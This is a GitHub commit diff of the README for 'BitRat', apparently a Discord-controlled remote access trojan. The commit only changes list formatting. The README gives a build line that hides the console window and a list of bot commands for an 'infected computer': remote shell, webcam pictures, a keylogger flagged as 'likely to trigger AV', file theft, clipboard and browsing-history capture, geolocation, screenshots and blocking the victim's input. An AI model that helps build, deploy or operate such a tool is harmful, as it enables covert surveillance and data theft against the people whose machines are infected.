Skip to content

Commit 9904143

Browse files
author
DaniDuese
authored
Information
1 parent 3470cae commit 9904143

File tree

1 file changed

+29
-29
lines changed

1 file changed

+29
-29
lines changed

README.md

+29-29
Original file line numberDiff line numberDiff line change
@@ -31,35 +31,35 @@ PyInstaller --onefile --noconsole --hidden-import=discord BitRat.py
3131
## **Modules**
3232
```
3333
Availaible commands are :
34-
--> !message = Show a message box displaying your text / Syntax = "!message example"
35-
--> !shell = Execute a shell command /Syntax = "!shell whoami"
36-
--> !webcampic = Take a picture from the webcam
37-
--> !windowstart = Start logging current user window (logging is shown in the bot activity)
38-
--> !windowstop = Stop logging current user window
39-
--> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
40-
--> !admincheck = Check if program has admin privileges
41-
--> !sysinfo = Gives info about infected computer
42-
--> !history = Get computer navigation history
43-
--> !download = Download a file from infected computer
44-
--> !upload = Upload file from website to computer / Syntax = "!upload file.png" (with attachment)
45-
--> !cd = Changes directory
46-
--> !write = Type your desired sentence on infected computer
47-
--> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
48-
--> !clipboard = Retrieve infected computer clipboard content
49-
--> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
50-
--> !startkeylogger = Starts a keylogger / Warning : Likely to trigger AV
51-
--> !stopkeylogger = Stops keylogger
52-
--> !dumpkeylogger = Dumps the keylog
53-
--> !volumemax = Put volume at 100%
54-
--> !volumezero = Put volume at 0%
55-
--> !idletime = Get the idle time of user's on target computer
56-
--> !sing = Play chosen video in background
57-
--> !stopsing = Stop video playing in background
58-
--> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
59-
--> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
60-
--> !screenshot = Get the screenshot of the user's current screen
61-
--> !exit = Exit program
62-
--> !kill = Kill a session or all sessions except current one / Syntax = "!kill session-3" or "!kill all"
34+
- !message = Show a message box displaying your text / Syntax = "!message example"
35+
- !shell = Execute a shell command /Syntax = "!shell whoami"
36+
- !webcampic = Take a picture from the webcam
37+
- !windowstart = Start logging current user window (logging is shown in the bot activity)
38+
- !windowstop = Stop logging current user window
39+
- !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
40+
- !admincheck = Check if program has admin privileges
41+
- !sysinfo = Gives info about infected computer
42+
- !history = Get computer navigation history
43+
- !download = Download a file from infected computer
44+
- !upload = Upload file from website to computer / Syntax = "!upload file.png" (with attachment)
45+
- !cd = Changes directory
46+
- !write = Type your desired sentence on infected computer
47+
- !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
48+
- !clipboard = Retrieve infected computer clipboard content
49+
- !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
50+
- !startkeylogger = Starts a keylogger / Warning : Likely to trigger AV
51+
- !stopkeylogger = Stops keylogger
52+
- !dumpkeylogger = Dumps the keylog
53+
- !volumemax = Put volume at 100%
54+
- !volumezero = Put volume at 0%
55+
- !idletime = Get the idle time of user's on target computer
56+
- !sing = Play chosen video in background
57+
- !stopsing = Stop video playing in background
58+
- !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
59+
- !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
60+
- !screenshot = Get the screenshot of the user's current screen
61+
- !exit = Exit program
62+
- !kill = Kill a session or all sessions except current one / Syntax = "!kill session-3" or "!kill all"
6363
```
6464

6565
# Achievements

0 commit comments

Comments
 (0)